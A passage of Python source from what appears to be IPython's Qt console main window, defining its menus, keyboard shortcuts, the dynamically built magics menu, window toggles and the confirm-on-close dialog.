self.add_menu_action(self.edit_menu, self.copy_action, True)
self.copy_raw_action = QtGui.QAction("Copy (&Raw Text)",
self,
shortcut="Ctrl+Shift+C",
triggered=self.copy_raw_active_frontend
)
self.add_menu_action(self.edit_menu, self.copy_raw_action, True)
self.paste_action = QtGui.QAction("&Paste",
self,
shortcut=QtGui.QKeySequence.Paste,
triggered=self.paste_active_frontend
)
self.add_menu_action(self.edit_menu, self.paste_action, True)
self.edit_menu.addSeparator()
selectall = QtGui.QKeySequence(QtGui.QKeySequence.SelectAll)
if selectall.matches("Ctrl+A") and sys.platform != 'darwin':
# Only override the default if there is a collision.
# Qt ctrl = cmd on OSX, so the match gets a false positive on OSX.
selectall = "Ctrl+Shift+A"
self.select_all_action = QtGui.QAction("Select &All",
self,
shortcut=selectall,
triggered=self.select_all_active_frontend
)
self.add_menu_action(self.edit_menu, self.select_all_action, True)
def init_view_menu(self):
self.view_menu = self.menuBar().addMenu("&View")
if sys.platform != 'darwin':
# disable on OSX, where there is always a menu bar
self.toggle_menu_bar_act = QtGui.QAction("Toggle &Menu Bar",
self,
shortcut="Ctrl+Shift+M",
statusTip="Toggle visibility of menubar",
triggered=self.toggle_menu_bar)
self.add_menu_action(self.view_menu, self.toggle_menu_bar_act)
fs_key = "Ctrl+Meta+F" if sys.platform == 'darwin' else "F11"
self.full_screen_act = QtGui.QAction("&Full Screen",
self,
shortcut=fs_key,
statusTip="Toggle between Fullscreen and Normal Size",
triggered=self.toggleFullScreen)
self.add_menu_action(self.view_menu, self.full_screen_act)
self.view_menu.addSeparator()
self.increase_font_size = QtGui.QAction("Zoom &In",
self,
shortcut=QtGui.QKeySequence.ZoomIn,
triggered=self.increase_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.increase_font_size, True)
self.decrease_font_size = QtGui.QAction("Zoom &Out",
self,
shortcut=QtGui.QKeySequence.ZoomOut,
triggered=self.decrease_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.decrease_font_size, True)
self.reset_font_size = QtGui.QAction("Zoom &Reset",
self,
shortcut="Ctrl+0",
triggered=self.reset_font_size_active_frontend
)
self.add_menu_action(self.view_menu, self.reset_font_size, True)
self.view_menu.addSeparator()
self.clear_action = QtGui.QAction("&Clear Screen",
self,
shortcut='Ctrl+L',
statusTip="Clear the console",
triggered=self.clear_magic_active_frontend)
self.add_menu_action(self.view_menu, self.clear_action)
self.pager_menu = self.view_menu.addMenu("&Pager")
hsplit_action = QtGui.QAction(".. &Horizontal Split",
self,
triggered=lambda: self.set_paging_active_frontend('hsplit'))
vsplit_action = QtGui.QAction(" : &Vertical Split",
self,
triggered=lambda: self.set_paging_active_frontend('vsplit'))
inside_action = QtGui.QAction(" &Inside Pager",
self,
triggered=lambda: self.set_paging_active_frontend('inside'))
self.pager_menu.addAction(hsplit_action)
self.pager_menu.addAction(vsplit_action)
self.pager_menu.addAction(inside_action)
def init_kernel_menu(self):
self.kernel_menu = self.menuBar().addMenu("&Kernel")
# Qt on OSX maps Ctrl to Cmd, and Meta to Ctrl
# keep the signal shortcuts to ctrl, rather than
# platform-default like we do elsewhere.
ctrl = "Meta" if sys.platform == 'darwin' else "Ctrl"
self.interrupt_kernel_action = QtGui.QAction("&Interrupt current Kernel",
self,
triggered=self.interrupt_kernel_active_frontend,
shortcut=ctrl+"+C",
)
self.add_menu_action(self.kernel_menu, self.interrupt_kernel_action)
self.restart_kernel_action = QtGui.QAction("&Restart current Kernel",
self,
triggered=self.restart_kernel_active_frontend,
shortcut=ctrl+"+.",
)
self.add_menu_action(self.kernel_menu, self.restart_kernel_action)
self.kernel_menu.addSeparator()
self.confirm_restart_kernel_action = QtGui.QAction("&Confirm kernel restart",
self,
checkable=True,
checked=self.active_frontend.confirm_restart,
triggered=self.toggle_confirm_restart_active_frontend
)
self.add_menu_action(self.kernel_menu, self.confirm_restart_kernel_action)
self.tab_widget.currentChanged.connect(self.update_restart_checkbox)
def _make_dynamic_magic(self,magic):
"""Return a function `fun` that will execute `magic` on active frontend.
Parameters
----------
magic : string
string that will be executed as is when the returned function is called
Returns
-------
fun : function
function with no parameters, when called will execute `magic` on the
current active frontend at call time
See Also
--------
populate_all_magic_menu : generate the "All Magics..." menu
Notes
-----
`fun` executes `magic` in active frontend at the moment it is triggered,
not the active frontend at the moment it was created.
This function is mostly used to create the "All Magics..." Menu at run time.
"""
# need two level nested function to be sure to pass magic
# to active frontend **at run time**.
def inner_dynamic_magic():
self.active_frontend.execute(magic)
inner_dynamic_magic.__name__ = "dynamics_magic_s"
return inner_dynamic_magic
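# Example: self._make_dynamic_magic("%who") returns a zero-argument callable
# that runs "%who" in whichever frontend is active at the moment it is
# triggered; populate_all_magic_menu() below builds its QActions this way.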
def populate_all_magic_menu(self, display_data=None):
"""Clean "All Magics..." menu and repopulate it with `display_data`
Parameters
----------
display_data : dict,
dict of display_data for the magics dict of a MagicsManager.
Expects json data, as the result of %lsmagic
"""
for k,v in list(self._magic_menu_dict.items()):
v.clear()
self.all_magic_menu.clear()
if not display_data:
return
if display_data['status'] != 'ok':
self.log.warn("%%lsmagic user-expression failed: %s" % display_data)
return
mdict = json.loads(display_data['data'].get('application/json', {}))
for mtype in sorted(mdict):
subdict = mdict[mtype]
prefix = magic_escapes[mtype]
for name in sorted(subdict):
mclass = subdict[name]
magic_menu = self._get_magic_menu(mclass)
pmagic = prefix + name
# Adding separate QActions is needed for some window managers
xaction = QtGui.QAction(pmagic,
self,
triggered=self._make_dynamic_magic(pmagic)
)
xaction_all = QtGui.QAction(pmagic,
self,
triggered=self._make_dynamic_magic(pmagic)
)
magic_menu.addAction(xaction)
self.all_magic_menu.addAction(xaction_all)
def update_all_magic_menu(self):
""" Update the list of magics in the "All Magics..." Menu
Ask the kernel for the list of available magics and populate the
menu with the list received back.
"""
self.active_frontend._silent_exec_callback('get_ipython().magic("lsmagic")',
self.populate_all_magic_menu)
def _get_magic_menu(self,menuidentifier, menulabel=None):
"""return a submagic menu by name, and create it if needed
parameters:
-----------
menulabel : str
Label for the menu
Will infere the menu name from the identifier at creation if menulabel not given.
To do so you have too give menuidentifier as a CamelCassedString
"""
menu = self._magic_menu_dict.get(menuidentifier,None)
if not menu :
if not menulabel:
menulabel = re.sub("([a-zA-Z]+)([A-Z][a-z])","\g<1> \g<2>",menuidentifier)
menu = QtGui.QMenu(menulabel,self.magic_menu)
self._magic_menu_dict[menuidentifier]=menu
self.magic_menu.insertMenu(self.magic_menu_separator,menu)
return menu
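# Example of the label inference above: with no menulabel given, the regex
# turns the identifier "BasicMagics" into the label "Basic Magics".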
def init_magic_menu(self):
self.magic_menu = self.menuBar().addMenu("&Magic")
self.magic_menu_separator = self.magic_menu.addSeparator()
self.all_magic_menu = self._get_magic_menu("AllMagics", menulabel="&All Magics...")
# This action should usually not appear as it will be cleared when menu
# is updated at first kernel response. Though, it is necessary when
# connecting through X-forwarding, as in this case, the menu is not
# auto updated, SO DO NOT DELETE.
self.pop = QtGui.QAction("&Update All Magic Menu ",
self, triggered=self.update_all_magic_menu)
self.add_menu_action(self.all_magic_menu, self.pop)
# we need to populate the 'Magic Menu' once the kernel has answered at
# least once; let's trigger it immediately, but it isn't assured to work yet
self.pop.trigger()
self.reset_action = QtGui.QAction("&Reset",
self,
statusTip="Clear all variables from workspace",
triggered=self.reset_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.reset_action)
self.history_action = QtGui.QAction("&History",
self,
statusTip="show command history",
triggered=self.history_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.history_action)
self.save_action = QtGui.QAction("E&xport History ",
self,
statusTip="Export History as Python File",
triggered=self.save_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.save_action)
self.who_action = QtGui.QAction("&Who",
self,
statusTip="List interactive variables",
triggered=self.who_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_action)
self.who_ls_action = QtGui.QAction("Wh&o ls",
self,
statusTip="Return a list of interactive variables",
triggered=self.who_ls_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.who_ls_action)
self.whos_action = QtGui.QAction("Who&s",
self,
statusTip="List interactive variables with details",
triggered=self.whos_magic_active_frontend)
self.add_menu_action(self.magic_menu, self.whos_action)
def init_window_menu(self):
self.window_menu = self.menuBar().addMenu("&Window")
if sys.platform == 'darwin':
# add min/maximize actions to OSX, which lacks default bindings.
self.minimizeAct = QtGui.QAction("Mini&mize",
self,
shortcut="Ctrl+m",
statusTip="Minimize the window/Restore Normal Size",
triggered=self.toggleMinimized)
# maximize is called 'Zoom' on OSX for some reason
self.maximizeAct = QtGui.QAction("&Zoom",
self,
shortcut="Ctrl+Shift+M",
statusTip="Maximize the window/Restore Normal Size",
triggered=self.toggleMaximized)
self.add_menu_action(self.window_menu, self.minimizeAct)
self.add_menu_action(self.window_menu, self.maximizeAct)
self.window_menu.addSeparator()
prev_key = "Ctrl+Shift+Left" if sys.platform == 'darwin' else "Ctrl+PgUp"
self.prev_tab_act = QtGui.QAction("Pre&vious Tab",
self,
shortcut=prev_key,
statusTip="Select previous tab",
triggered=self.prev_tab)
self.add_menu_action(self.window_menu, self.prev_tab_act)
next_key = "Ctrl+Shift+Right" if sys.platform == 'darwin' else "Ctrl+PgDown"
self.next_tab_act = QtGui.QAction("Ne&xt Tab",
self,
shortcut=next_key,
statusTip="Select next tab",
triggered=self.next_tab)
self.add_menu_action(self.window_menu, self.next_tab_act)
def init_help_menu(self):
# Please keep the Help menu on Mac OS even if empty: it will
# automatically contain a search field for searching inside menus.
# Also keep it spelled in English; as long as Qt doesn't support
# a QAction.MenuRole like HelpMenuRole, renaming it would lose
# this search-field functionality.
self.help_menu = self.menuBar().addMenu("&Help")
# Help Menu
self.intro_active_frontend_action = QtGui.QAction("&Intro to IPython",
self,
triggered=self.intro_active_frontend
)
self.add_menu_action(self.help_menu, self.intro_active_frontend_action)
self.quickref_active_frontend_action = QtGui.QAction("IPython &Cheat Sheet",
self,
triggered=self.quickref_active_frontend
)
self.add_menu_action(self.help_menu, self.quickref_active_frontend_action)
self.guiref_active_frontend_action = QtGui.QAction("&Qt Console",
self,
triggered=self.guiref_active_frontend
)
self.add_menu_action(self.help_menu, self.guiref_active_frontend_action)
self.onlineHelpAct = QtGui.QAction("Open Online &Help",
self,
triggered=self._open_online_help)
self.add_menu_action(self.help_menu, self.onlineHelpAct)
# minimize/maximize/fullscreen actions:
def toggle_menu_bar(self):
menu_bar = self.menuBar()
if menu_bar.isVisible():
menu_bar.setVisible(False)
else:
menu_bar.setVisible(True)
def toggleMinimized(self):
if not self.isMinimized():
self.showMinimized()
else:
self.showNormal()
def _open_online_help(self):
filename="http://ipython.org/ipython-doc/stable/index.html"
webbrowser.open(filename, new=1, autoraise=True)
def toggleMaximized(self):
if not self.isMaximized():
self.showMaximized()
else:
self.showNormal()
# Minimizing/maximizing while in full screen causes a bug
# when leaving full screen, at least on OSX
def toggleFullScreen(self):
if not self.isFullScreen():
self.showFullScreen()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(False)
self.minimizeAct.setEnabled(False)
else:
self.showNormal()
if sys.platform == 'darwin':
self.maximizeAct.setEnabled(True)
self.minimizeAct.setEnabled(True)
def set_paging_active_frontend(self, paging):
self.active_frontend._set_paging(paging)
def close_active_frontend(self):
self.close_tab(self.active_frontend)
def restart_kernel_active_frontend(self):
self.active_frontend.request_restart_kernel()
def interrupt_kernel_active_frontend(self):
self.active_frontend.request_interrupt_kernel()
def toggle_confirm_restart_active_frontend(self):
widget = self.active_frontend
widget.confirm_restart = not widget.confirm_restart
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def update_restart_checkbox(self):
if self.active_frontend is None:
return
widget = self.active_frontend
self.confirm_restart_kernel_action.setChecked(widget.confirm_restart)
def cut_active_frontend(self):
widget = self.active_frontend
if widget.can_cut():
widget.cut()
def copy_active_frontend(self):
widget = self.active_frontend
widget.copy()
def copy_raw_active_frontend(self):
self.active_frontend._copy_raw_action.trigger()
def paste_active_frontend(self):
widget = self.active_frontend
if widget.can_paste():
widget.paste()
def undo_active_frontend(self):
self.active_frontend.undo()
def redo_active_frontend(self):
self.active_frontend.redo()
def reset_magic_active_frontend(self):
self.active_frontend.execute("%reset")
def history_magic_active_frontend(self):
self.active_frontend.execute("%history")
def save_magic_active_frontend(self):
self.active_frontend.save_magic()
def clear_magic_active_frontend(self):
self.active_frontend.execute("%clear")
def who_magic_active_frontend(self):
self.active_frontend.execute("%who")
def who_ls_magic_active_frontend(self):
self.active_frontend.execute("%who_ls")
def whos_magic_active_frontend(self):
self.active_frontend.execute("%whos")
def print_action_active_frontend(self):
self.active_frontend.print_action.trigger()
def export_action_active_frontend(self):
self.active_frontend.export_action.trigger()
def select_all_active_frontend(self):
self.active_frontend.select_all_action.trigger()
def increase_font_size_active_frontend(self):
self.active_frontend.increase_font_size.trigger()
def decrease_font_size_active_frontend(self):
self.active_frontend.decrease_font_size.trigger()
def reset_font_size_active_frontend(self):
self.active_frontend.reset_font_size.trigger()
def guiref_active_frontend(self):
self.active_frontend.execute("%guiref")
def intro_active_frontend(self):
self.active_frontend.execute("?")
def quickref_active_frontend(self):
self.active_frontend.execute("%quickref")
#---------------------------------------------------------------------------
# QWidget interface
#---------------------------------------------------------------------------
def closeEvent(self, event):
""" Forward the close event to every tabs contained by the windows
"""
if self.tab_widget.count() == 0:
# no tabs, just close
event.accept()
return
# Do not loop on the widget count as it changes while closing
title = self.window().windowTitle()
cancel = QtGui.QMessageBox.Cancel
okay = QtGui.QMessageBox.Ok
if self.confirm_exit:
if self.tab_widget.count() > 1:
msg = "Close all tabs, stop all kernels, and Quit?"
else:
msg = "Close console, stop kernel, and Quit?"
info = "Kernels not started here (e.g. notebooks) will be left alone."
closeall = QtGui.QPushButton("&Quit", self)
closeall.setShortcut('Q')
box = QtGui.QMessageBox(QtGui.QMessageBox.Question,
title, msg)
box.setInformativeText(info)
box.addButton(cancel)
box.addButton(closeall, QtGui.QMessageBox.YesRole)
box.setDefaultButton(closeall)
box.setEscapeButton(cancel)
pixmap = QtGui.QPixmap(self._app.icon.pixmap(QtCore.QSize(64,64)))
box.setIconPixmap(pixmap)
reply = box.exec_()
else:
reply = okay
if reply == cancel:
event.ignore()
return
if reply == okay:
while self.tab_widget.count() >= 1:
# prevent further confirmations:
widget = self.active_frontend
widget._confirm_exit = False
self.close_tab(widget)
event.accept()
|